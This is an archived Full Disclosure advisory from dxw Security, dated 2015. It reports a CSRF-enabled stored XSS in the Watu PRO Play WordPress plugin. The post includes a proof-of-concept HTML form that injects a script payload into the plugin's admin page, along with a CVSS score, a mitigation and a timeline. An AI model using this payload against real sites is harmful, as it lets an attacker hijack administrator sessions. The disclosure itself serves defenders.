[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[FD] Stored XSS in Watu PRO Play allows unauthenticated attackers to do almost anything an admin can (WordPress plugin)

To: fulldisclosure@xxxxxxxxxxxx
Subject: [FD] Stored XSS in Watu PRO Play allows unauthenticated attackers to do almost anything an admin can (WordPress plugin)
From: dxw Security <security@xxxxxxx>
Date: Tue, 1 Sep 2015 16:12:23 +0000

Details
================
Software: Watu PRO Play
Version: 1.9.2.1
Homepage: http://calendarscripts.info/watupro/modules.html#play
Advisory report: 
https://security.dxw.com/advisories/stored-xss-in-watu-pro-play-allows-unauthenticated-attacker-to-do-almost-anything-an-admin-can/
CVE: Awaiting assignment
CVSS: 5.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:N)

Description
================
Stored XSS in Watu PRO Play allows unauthenticated attackers to do almost 
anything an admin can

Vulnerability
================
An attacker able to convince an admin to visit a link of their choosing (e.g. 
via a phishing attack) is able to execute arbitrary JavaScript. This makes use 
of a CSRF vulnerability (no nonce protection on the levels form)

Proof of concept
================
If a logged-in administrator user clicks the submit button on this form, a 
JavaScript alert will display on /wp-admin/admin.php?page=watuproplay_levels 
(in a real attack the form can be made to auto-submit using JavaScript):
<form 
action=\"http://localhost/wp-admin/admin.php?page=watuproplay_levels&amp;action=add\";
 method=\"POST\">
  <input type=\"text\" name=\"name\" value=\"&lt;script>alert(1)&lt;/script>\">
  <input type=\"text\" name=\"ok\" value=\"1\">
  <input type=\"submit\">
</form>

Mitigations
================
Disable the plugin until a new version is released that fixes this bug

Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our 
disclosure policy: https://security.dxw.com/disclosure/

Please contact us on security@xxxxxxx to acknowledge this report if you 
received it via a third party (for example, plugins@xxxxxxxxxxxxx) as they 
generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this 
report with 14 days.

Timeline
================

2015-08-11: Discovered
2015-08-26: Reported to vendor by email
2015-08-26: Requested CVE



Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.
          


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Prev by Date: [FD] CSRF in Watu PRO allows unauthenticated attackers to delete quizzes (WordPress plugin)
Next by Date: [FD] Zhone ADSL2+ 4P Bridge & Router (Broadcom) - Multiple Vulnerabilities
Previous by thread: [FD] CSRF in Watu PRO allows unauthenticated attackers to delete quizzes (WordPress plugin)
Next by thread: [FD] Zhone ADSL2+ 4P Bridge & Router (Broadcom) - Multiple Vulnerabilities
Index(es):
- Date
- Thread